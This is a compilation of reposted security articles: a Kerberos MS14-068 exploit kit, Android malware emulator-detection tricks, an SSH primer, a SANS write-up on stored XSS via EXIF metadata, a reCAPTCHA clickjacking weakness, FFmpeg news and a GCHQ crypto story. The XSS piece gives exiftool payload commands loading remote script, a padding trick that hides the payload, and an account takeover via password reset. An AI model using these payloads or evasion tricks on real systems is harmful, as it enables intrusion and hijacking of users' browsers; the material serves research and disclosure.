Python Kerberos Exploitation Kit PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. (Still in development) For now, only a few functionalities have been implemented (in a quite Quick'n'Dirty way) to exploit MS14-068 (CVE-2014-6324) . More is coming... Author Sylvain Monné Contact : sylvain dot monne at solucom dot fr http://twitter.com/bidord Special thanks to: Benjamin DELPY gentilkiwi Library content kek.krb5: Kerberos V5 (RFC 4120) ASN.1 structures and basic protocol functions kek.ccache: Credential Cache Binary Format (cchache) kek.pac: Microsoft Privilege Attribute Certificate Data Structure (MS-PAC) kek.crypto: Kerberos and MS specific cryptographic functions Exploits ms14-068.py Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups : Domain Users (513) Domain Admins (512) Schema Admins (518) Enterprise Admins (519) Group Policy Creator Owners (520) Sursa: https://github.com/bidord/pykek
-
Android Malware Evasion Techniques - Emulator Detection Most of the modern malware try to escape from being analysed and one of the first thing they do is to check if they are running on a controlled environment. The controlled environment refers to an emulator in the world of Android malware. If the malware runs on an emulator, that means it is most probably being investigated by a researcher. There are various methods that malware writers use to detect the emulated environment. 1.) Check Product Name: In Android emulator, product name of the device contains "sdk" string so it is a useful clue to detect if the app is running on an emulator. In order to check the product name, you can use the following code snippet: 2.) Check Model Name: The default product name of the Android emulator contains "sdk" string. So it is worth to check model name in order to detect emulator use. 3.) Check SIM Operator Name: In Android emulators, the SIM operator name comes with the default "Android" string. It is not the case that you can see in regular physical devices even there is no SIM card installed in the device. 4.) Check Network Operator Name: Similar to the SIM Operator Name, the network operator name also comes with the default "Android" string. It is a good idea to check network operator name in order to decide if the app is running on an emulator. By combining these 4 techniques mentioned above, you can write a basic Android app that shows these values. In order to compare if they are really work, you can install the app both to the emulator and a real device. The picture on the left hand side is the screenshot taken from Samsung Galaxy S4 phone and the one on the right is the screenshot of an emulator. You can see the difference clearly. 5.) Check ro.kernel.qemu and ro.secure Property: Additionally you can check the Android system properties to detect emulated environment. There are various property files in Android filesystem: /default.prop /system/build.prop /data/local.prop Properties are stored in a key value pair format in these property files. You can see the values of the properties by typing adb shell getprop <key> command. There are some critical properties indicating the emulator environment. ro.secure ro.kernel.qemu If the value of ro.secure is "0", or the value of ro.kernel.qemu is 1, ADB shell runs as root and that means the environment which, the app is running is an emulator. Because in a physical device ADB shell runs in a regular user right, not the root. In order to check these properties you can use the code snippets below. I uploaded a sample detecttion code to my Github page that combines all the methods above: https://github.com/oguzhantopgul/Android-Emulator-Detection In this blog post i tried to mention about my favourite Android Emulator detection methods. If you know much better techniques please send me a comment. Edit: I've just noticed the Tim Strazzere's (@timstrazz) Android Project on emulator detection. You can find it in his github repo link below: https://github.com/strazzere/anti-emulator Yesterday, Oguzhan Topgul taraf?ndan yay?nland? Sursa: {ouz}: Android Malware Evasion Techniques - Emulator Detection
-
Getting started with SSH security and configuration Are you a new UNIX administrator who needs to be able to run communication over a network in the most secure fashion possible? Brush up on the basics, learn the intricate details of SSH, and delve into the advanced capabilities of SSH to automate securely your daily system maintenance, remote system management, and use within advanced scripts to manage multiple hosts. PDF (391 KB) | Roger Hill (unixman@charter.net), Independent author What is SSH? A basic description Secure Shell (SSH) was intended and designed to afford the greatest protection when remotely accessing another host over the network. It encrypts the network exchange by providing better authentication facilities as well as features such as Secure Copy (SCP), Secure File Transfer Protocol (SFTP), X session forwarding, and port forwarding to increase the security of other insecure protocols. Various types of encryption are available, ranging from 512-bit encryption to as high as 32768 bits, inclusive of ciphers, like Blowfish, Triple DES, CAST-128, Advanced Encryption Scheme (AES), and ARCFOUR. Higher-bit encryption configurations come at a cost of greater network bandwidth use. Figure 1 and Figure 2 show how easily a telnet session can be casually viewed by anyone on the network using a network-sniffing application such as Wireshark. Figure 1. Telnet protocol sessions are unencrypted. Frequently used acronyms API: Application programming interface FTP: File Transfer Protocol IETF: Internet Engineering Task Force POSIX: Portable Operating System Interface for UNIX RFC: Request for Comments VPN: Virtual private network When using an unsecured, "clear text" protocol such as telnet, anyone on the network can pilfer your passwords and other sensitive information. Figure 1 shows user fsmythe logging in to a remote host through a telnet connection. He enters his user name fsmythe and password r@m$20!0, which are both then viewable by any other user on the same network as our hapless and unsuspecting telnet user. Figure 2. SSH protocol sessions are encrypted. Figure 2 provides an overview of a typical SSH session and shows how the encrypted protocol cannot be viewed by any other user on the same network segment. Every major Linux® and UNIX® distribution now comes with a version of the SSH packages installed by default—typically, the open source OpenSSH packages—so there is little need to download and compile from source. If you're not on a Linux or UNIX platform, a plethora of open source and freeware SSH-based tools are available that enjoy a large following for support and practice, such as WinSCP, Putty, FileZilla, TTSSH, and Cygwin (POSIX software installed on top the Windows® operating system). These tools offer a UNIX- or Linux-like shell interface on a Windows platform. Whatever your operating system, SSH touts many positive benefits for commonplace, everyday computing. Not only is it dependable, secure, and flexible, but it is also simple to install, use, and configure—not to mention feature laden. SSH architecture IETF RFCs 4251 through 4256 define SSH as the "Secure Shell Protocol for remote login and other secure network services over an insecure network." The shell consists of three main elements (see Figure 3): Transport Layer Protocol: This protocol accommodates server authentication, privacy, and integrity with perfect forward privacy. This layer can provide optional compression and is run over a TCP/IP connection but can also be used on top of any other dependable data stream. User Authentication Protocol: This protocol authenticates the client to the server and runs over the transport layer. Connection Protocol: This protocol multiplexes the encrypted tunnel to numerous logical channels, running over the User Authentication Protocol. Figure 3. SSH protocol logical layers The transport layer is responsible for key exchange and server authentication. It sets up encryption, integrity verification, and (optionally) compression and exposes to the upper layer an API for sending and receiving plain text packets. A user authentication layer provides authentication for clients as well as several authentication methods. Common authentication methods include password, public key, keyboard-interactive, GSSAPI, SecureID, and PAM. The connection layer defines channels, global requests, and the channel requests through which SSH services are provided. A single SSH connection can host multiple channels concurrently, each transferring data in both directions. Channel requests relay information such as the exit code of a server-side process. The SSH client initiates a request to forward a server-side port. This open architecture design provides extensive flexibility. The transport layer is comparable to Transport Layer Security (TLS), and you can employ custom authentication methods to extend the user authentication layer. Through the connection layer, you can multiplex secondary sessions into a single SSH connection (see Figure 4). Articol complet: Getting started with SSH security and configuration
-
Finding Zero-Day XSS Vulns via Doc Metadata Posted by eskoudis Filed under Methodology, web pen testing [Editor's Note: Chris Andre Dale has a nice article for us about cross-site-scripting attacks, and he's found a ton of them in various high-profile platforms on the Internet, especially in sites that display or process images. He even found one in WordPress and responsibly disclosed it, resulting in a fix for the platform released just a few weeks ago. In this article, Chris shares his approach and discoveries, with useful lessons for all pen testers. Oh... and if you are going to test systems, make sure you have appropriate permission and don't do anything that could break a target system or harm its users. Thanks for the article, Chris! --Ed.] By Chris Andre Dale XSS Here, XSS There, XSS Everywhere! Today Cross-Site Scripting (XSS) is very widespread. While it is not a newly discovered attack vector, we still see it all the time in the wild. Do you remember back in the days, when you would click on a website's guestbook, and suddenly you would have tons of pop-ups or redirections happen? Yeah, that's often XSS for you. Today I see XSS vulnerabilities in almost all of the penetration testing engagements that I conduct. Even to this very day, there is evidence of old XSS worms stuck on the web. Remember MySpace? Yeah, me neither. Make a Google search for "Samy is my hero site:myspace.com". You will see thousands of ghostly remains of a XSS worm back from 2006! The infamous Samy worm does not still linger, but what you are seeing is the remains of MySpace profiles that were victims of this worm back in 2006. XSS is usually ranked only as a medium impact when exploited. For instance, OWASP has rated this vulnerability as a moderate impact. I disagree on this. In many cases XSS can be truly brutal and potentially life threatening. What do I mean? When XSS is bundled with other vulnerabilities, such as Cross-Site Request Forgery (CSRF), we can quickly imagine some very nasty scenarios. What if your XSS exploit hooks an IT Operations administrator, and through the XSS you add your CSRF payloads to perform administrative functions to their HVAC solutions? Alternatively, consider the unfortunate event where an attacker has successfully compromised thousands of hosts, using them all to DDOS an unsuspected victim. New XSS attack vectors arise all the time, however we don't often see something truly new or untraditional. Wouldn't it be cool to see something else other than just your ordinary filter bypass? In this article, I'll cover how I've successfully found 0-day exploits in WordPress, public sites and plugins for popular CMS systems, by merely using using this technique. Let's take a look at embedding XSS payloads into image metadata, more specifically EXIF data in JPEG images. This can be accomplished several ways. If you are old school (or perhaps just old , you can accomplish this by modifying your camera settings: The camera type used here is a Canon(1) camera. Any hacker with any respect for themselves, uses ExifTool(2) by Phil Harvey to accomplish the task. The following command allows us to add/overwrite an exif tag, specifically the camera type that has allegedly been used to take this photograph: exiftool.exe -"Camera Model Name"="// " "C:\research.jpg" Let's not just add the model name, let's extend it to other values as well: As you can see, we've added the standard javascript alert code to a whole set of different EXIF data fields. Now we'll create a simple PHP script that will mimic a real world example of a system that uses EXIF data: <?php $filename = $_GET['filename']; echo $filename . " \n"; $exif = exif_read_data('tests/' . $filename, 'IFD0'); echo $exif===false ? "No header data found. \n" : "Image contains headers \n"; $exif = exif_read_data('tests/' . $filename, 0, true); foreach ($exif as $key => $section) { foreach ($section as $name => $val) { echo "$key.$name: $val \n"; } } ?> The above script will simply iterate through all EXIF data keys it finds and will output the respective value. For testing purposes, this is exactly what we want. PHP's EXIF parser does not have filtering in place by default, making it very interesting to test this attack vector. In cases where a developer has forgotten to do sanitization on these fields, we may have a successful attack. Developers think, in many cases, that some of their data is read-only, so why would they EVER need to sanitize it?! Common mistake... Using the script above, and armed with our the metadata-bombed picture, we can try to attack ourselves through the demo script. In the following picture, we have told the script to fetch our metadata-bombed picture, simply illustrating the attack with a JavaScript pop-up: So what? We've successfully attacked ourselves with a pop-up message? Well, there is so much more to this than just attacking ourselves. First of all, we've verified that there is no built-in filtering in the PHP exif_read_data function. That means that all developers need to remember is to apply filtering manually, and as we covered before, we all know that developers always remember this... Secondly, we've verified that we can gain executable JavaScript in someone's browser. From here, we can simply rewrite our pop-up payload to something much more subtle and evil, such as introducing a BeEF hook. More on this later. Scouring For 0 Day's Armed with a fully metadata-bombed picture, I set sail into the Wild Wild Web. I had to check whether my assumptions of developers failing to sanitize the EXIF data was true or not. From there, I roamed into the depths of picture upload sites... I started googling "upload picture", "picture sharing", "photograph sharing" and much more. On the sites that I found interesting, I registered an account and started uploading my pictures. On a side note, Mailinator(3) comes in handy doing this kind of research. In fact, I registered with the account no-reply@mailinator.com for most of the sites, however, to my great surprise, one of the sites already had an account with this username! What?! Someone had actually registered with this account before? Then undoubtedly, I could do a password reset! Sure enough, doing a password reset, I gained access to someone else's account. Whew... Now, who would EVER register an account on a Mailinator address for their private pictures? Another security researcher? Criminals? Where do I go from here? Do I really want to venture into someone else's account? If so, what will I find? Regardless of my questions and doubt, I decided to continue, knowing surely that there is no turning back from what I might be about to see. To my surprise, and more importantly, to my relief, the site contained a bunch of family vacation pictures from a trip to Indonesia. Many of the sites required registration, while many of them did not show any metadata at all. Out of 21 sites tested, 11 sites did not have a feature to display EXIF data, 7 sites had at least rudimentary filtering and 3 sites were found to be vulnerable. Not amazing numbers, however still fun to see it working in the wild, outside of my lab. What do I mean by rudimentary filtering? Well, it just means I didn't try to bypass the filtering. Additionally, I tested the attack vector on 3 WordPress plugins, whereas 2 were found vulnerable and one had the appropriate filtering in place. Responsible disclosure against the sites and plugins has been conducted. Some of the examples in this article have been anonymized because as of the launch of the article, they have still not patched the issue. Keep in mind, many of the sites that were applying filtering could still be vulnerable. I did not conduct any filter bypass in my testing. My gut feeling is that the filters were very rudimentary and could easily be bypassed. First, here is an example from 500px.com which was not found to be vulnerable: You can see the payload present in the title and the camera is automatically populated by the site. That means that instead of prompting me to set a title for my picture, the site used one of the EXIF data fields to pre-populate it for me. Interesting...this was something I saw as a repeating characteristic when doing my testing. Flickr also did appropriate filtering, keeping in mind, no filter bypass has been tried: One particular site did not like my testing at all. When trying to upload my picture, it seemed to break something: Anyway, we're not here for the failures, are we? We're here for the success stories! Ahh, this is the wonderful world of hacking...gaining success through other people's failures... *evil grin* Here is a site where we can see our attack manifest itself. Just by uploading the picture and then viewing it, it triggers this vulnerability: I also found the same vulnerability at other sites. We can see the image I've uploaded in the background -- a princess and a unicorn. Sadly, no farting rainbows... Many of the big sites were also tested, such as Google Plus, DeviantArt, and Photobucket. These were all applying some filtering. A site, however, that did not apply the necessary filtering was Wordpress. In the screenshot above I've successfully uploaded an image, by accessing it through its respective attachment page. Remember, I am using a harmless payload, just alerting a text message. This could be a completely stealthy attack payload if I wanted it to be. Let's dive further into the WordPress finding. The Wordpress Exploit WordPress is the most popular blogging platform on the internet today, ranking up more than 60 million websites in 2012 (4). Finding working exploits in such a platform can be very interesting for many actors, hence they also have a working bug bounty program (5). The vulnerability I'm demonstrating in this paper has been submitted to WordPress through responsible disclosure, and we held this article until they had properly patched the issue. The WordPress vulnerability manifests when an administrator, or editor, uploads an image with the ImageDescription EXIF data tag set to a JavaScript payload. The exploit works only for the user accounts as more strict filtering is put on the other accounts. This has sparked some controversy about this vulnerability, however, as I will prove in this article, we will create an attack that is fully stealthy, allowing the attack to take place without an administrator knowing what is going on. Why the controversy? With WordPress, and other CMS systems such as Sharepoint, some roles are allowed to upload HTML elements. With WordPress, administrators and editors are allowed to implement unfiltered HTML (6). The other side of the controversy is how the attack can be made super stealthy. The administrator has very limited ways to realize that he is doing something wrong and actually uploading malware into his site. Now, that's cool! This is also why WordPress has chosen to patch this issue. Embedding some JavaScript into the tag and then uploading it will trigger the vulnerability once a user views the attachment page of the image. Using Exiftool, you can accomplish this with the following command: Here I've changed my JavaScript payload to a reference instead of embedding the JavaScript file itself in the image. This will give us increased flexibility when creating working payloads. exiftool.exe -"ImageDescription"="<script src=\"http://pentesting.securesolutions.no/js.js\">" paramtest1.jpg The following example is one of my first runs of the attack. It is not stealthy as the administrator can easily pick up that something is wrong, simply by looking at the title element of the page. WordPress uses the ImageDescription element to populate the title element, and properly filters before doing so. We'll see soon how to bypass this. The attack works when you navigate to the attachment page, however any WordPress editor with IQ higher than their shoe-size would most likely realize that something is fishy, immediately deleting the picture. If we stopped at this point, I don't think the issue would warrant a patch or much attention at all, however the next steps allows us to go into stealth mode. If I figured out a way for the payload to be embedded, but without the title element being overridden, I could make the attack feasible. Luckily, I discovered a small artifact when doing the testing. Trying different types of encoding, and other obfuscation techniques, produced some really long strings. When producing a long enough string, I noticed that WordPress suddenly defaulted to using the filename as the title element! Nice! The following Exiftool command makes WordPress ignore the ImageDescription, allowing a more stealthy attack: exiftool.exe -"ImageDescription"=" <script src\"http://pentesting.securesolutions.no/js.js\"></script>" paramtes1.jpg Notice all the extra spaces. This extra padding makes WordPress think that this is too long for the title field, thus defaulting to simply using the filename. The attack now manifests more beautifully when we upload the picture: The picture loads normally. Our XSS vector is currently invisible. Here is what happens when someone, e.g. the administrator, visits the picture: The screenshot shows how I've successfully included my malicious JavaScript. This could be a simple BEeF(7) hook, allowing us a very high level of control of the victims. From here, it's game over. Best Regards, Cross-Site Scripting Why stop at EXIF data? What about other types of data, perhaps not in the same magnitude as online EXIF parsers, but let's look at embedding XSS into other data. What if a webpage allowed you to upload a Word document , and it would then automatically extract the Author field of the document and embed it on the site? That could definitely lead to a vulnerability. It sounds like a good vector for a XSS attacks, or even other types of attacks such as SQL Injection if they store the information in a database. When I look at the document I'm writing right now, I can see the following metadata information: Without a doubt, many of these parameters can easily be changed by the user, either through Exiftool or using the word processor itself. The following example shows editing the username to a XSS payload. I do apologize for the Norwegian text; I've been cursed with a Norwegian installation of Windows and Office by my IT-department. Pictures and documents. What about audio? Here is an example adding XSS to an mp3 file through the awesome free, and open-source, tool Audacity (8): There are probably tons of other situations where we can add these types of attacks. It's up to us to find them before the bad guys does. Conclusion Let's consider the future. The data we embed in metadata today might, sometime in the future, exploit services that has not yet been developed. Perhaps, we'll see XSS shooting out from projectors, chat services, glasses (e.g. Google Glass) or robots going crazy having alert(1)'s all over the place. Or perhaps even cooler, your files embedded with XSS today might someday, in the future, trigger a callback connection straight back to your BEeF hook... The bottom line is, data coming from a third party system, being a user or another system, should be sanitized! You know that whole concept of garbage in, garbage out? Let's stop that. Additionally, it is important for pen testers to have this information in their arsenal when doing their testing. The testers need to think outside the box and cover as much testing surface as possible. Also, Ed Skoudis had a student who mentioned some great research that has been made on sites processing metadata. I recommend checking out the research done at embeddedmetadata.org (9). It might spark some further testing and research for some of our readers. Now, go onward my friends and... References: http://www.amazon.com/Canon-CMOS-Digital-Camera-3-0-Inch/dp/B0040JHVCC http://www.sno.phy.queensu.ca/~phil/exiftool/ http://mailinator.com/ With 60 Million Websites, WordPress Rules The Web. So Where's The Money? - Forbes Security — Automattic WordPress Security Bug Bounty Program - White Fir Design BeEF - The Browser Exploitation Framework Project Audacity: Free Audio Editor and Recorder Embedded Metadata Initiative -Chris Andre Dale Sursa: SANS Penetration Testing | Finding Zero-Day XSS Vulns via Doc Metadata | SANS Institute
-
The No CAPTCHA problem When I read about No CAPTCHA for the first time I was really excited. Did we finally find a better solution? Hashcash? Or what? Finally it's available and the blog post disappointed me a bit. Here's Wordpress registration page successfully using No CAPTCHA. Now let's open it in incognito tab... Wait, annoying CAPTCHA again? But i'm a human! So what Google is trying to sell us as a comprehensive bot detecting algorithm is simply a whitelist based on your previous online behavior, CAPTCHAs you solved. Essentially - your cookies. Under the hood they replaced challenge/response pairs with token "g-recaptcha-response". Good guys get it "for free", bad guys still have to solve a challenge. Does it make bot's job harder? No at all. The legacy flow is still available and old OCR bots can keep recognizing. But what about new "find a similar image" challenges? Bots can't do that! As long as $1 per hour is ok for many people in 3rd world, bots won't need to solve new challenges. No matter how complex they are, bots simply need to get the JS code of challenge, show it to another human being (working for cheap or just a visitor on popular websites) and use the answer that human provided. The thing is No CAPTCHA actually introduces a new weakness! Abusing clickjacking we can make the user (a good guy) generate g-recaptcha-response for us - make a click (demo bot for wordpress). Then we can use this g-recaptcha-response to make a valid request to the victim (from our server or from user's browser). It's pretty much a serious weakness of new reCAPTCHA - instead of making everyone recognize those images we can make a bunch of good "trustworthy" users generate g-recaptcha-response-s for us. Bot's job just got easier! You're probably surprised, how can we use 3rd party data-sitekey on our website? Don't be - the Referrer-based protection was pretty easy to bypass with <meta name="referrer" content="never">. P.S. Many developers still think you need to wait a while to get a new challenge. @homakov I've used them in the past, accuracy is about 80% and response time about 10 seconds per attempt. Still too slow for some attacks. — Stephen de Vries (@stephendv) December 4, 2014 In fact you can prepare as many challenges as you want and then start spaming later. It's another reCAPTCHA weakness that will never be fixed. Author: Egor Homakov on 3:52 AM Sursa: Egor Homakov: The No CAPTCHA problem
-
[h=1]FFmpeg 2.5 Officially Released[/h]By Silviu Stahie The developers have added some new features A new FFmpeg version is out FFmpeg is a complete solution to record, convert, and stream audio and video and it was just upgraded to a new major version, 2.5. It comes with a lot of new features and it's pretty interesting. FFmpeg 2.5 has been dubbed "Bohr" and comes just 2.5 months after the previous release. There are not as many changes as you might think, but there are more than enough to keep users interested. "2.5 was released on 2014-12-04. It is the latest stable FFmpeg release from the 2.5 release branch, which was cut from master on 2014-12-04. Amongst lots of other changes, it includes all changes from ffmpeg-mt, libav master of 2014-12-03, libav 11 as of 2014-12-03,” reads the official announcement. Some of the updated packages in the latest FFmpeg framework include libavutil, libavcodec, libavformat, libavdevice, libavfilter, libavresample, libswscale, libswresample, and libpostproc. The devs have also said that the STL subtitle decoder is now supported, the XCB-based screen-grabber is now working properly, a SUP/PGS subtitle demuxer is now available, a number of fixes have been implemented as well. FFmpeg is the leading multimedia framework able to decode, encode, transcode, mux, demux, stream, filter, and play pretty much any media that humans and machines have created. A complete list of updates, features, and other fixes can be found in the official announcement. You can download FFmpeg 2.5 source package right now from Softpedia. Sursa: FFmpeg 2.5 Officially Released - Softpedia
-
GCHQ boffins quantum-busted its OWN crypto primitive 'Soliloquy' only ever talked to itself By Richard Chirgwin, 3 Dec 2014 While the application of quantum computers to cracking cryptography is still, for now, a futuristic scenario, crypto researchers are already taking that future seriously. It came as a surprise to Vulture South to find that in October of this year, researchers at GCHQ's information security arm the CESG abandoned work on a security primitive because they discovered a quantum attack against it. Presented to the ETSI here, with the full paper here, the documents outline the birth and death of a primitive the CESG called Soliloquy. Primitives are building blocks in the dizzyingly-complex business of assembling a cryptosystem: individual modules that are expected to be very well-characterised before they're accepted into security standards (and, in the case of crypto like RC4, dropped when they're no longer safe). Given that improving computer power is one of the ways a primitive can be broken, there's a constant background research effort into both creating the primitives of the future, and testing them before they're adopted – and that's where Soliloquy comes in. As the CESG paper states, Soliloquy was first proposed in 2007 as a cyclic-lattice key exchange primitive supporting between 3,000 and 10,000 bits for the public key. Between 2010 and 2013 – presumably as part of their effort to case-harden the primitive before releasing it into the wild – the boffins (Peter Campbell, Michael Groves and Dan Shepherd) developed what they call “a reasonably efficient quantum attack on the primitive”, and as a result, they cancelled the project. The quantum algorithm they describe would work by creating a quantum fingerprint of the lattice Soliloquy creates; “discreteise and bound” the control space needed; and run a quantum Fourier transform over that control space, iteratively to get lots of samples approximating the lattice. That's where the quantum attack is complete: after that, the samples would get fed into a classical lattice-based algorithm to recover the values you want – in other words, the key. The main challenge, the authors write, is to define “to define a suitable quantum fingerprinter” that could handle the control space. As the researchers drily note in their conclusion, “designing quantum-resistant cryptography is a difficult task”, and while researchers are starting to create such algorithms for deployment, “we caution that much care and patience will be required” to provide a thorough security assessment of any such protocol. ® Sursa: GCHQ boffins quantum-busted its OWN crypto primitive • The Register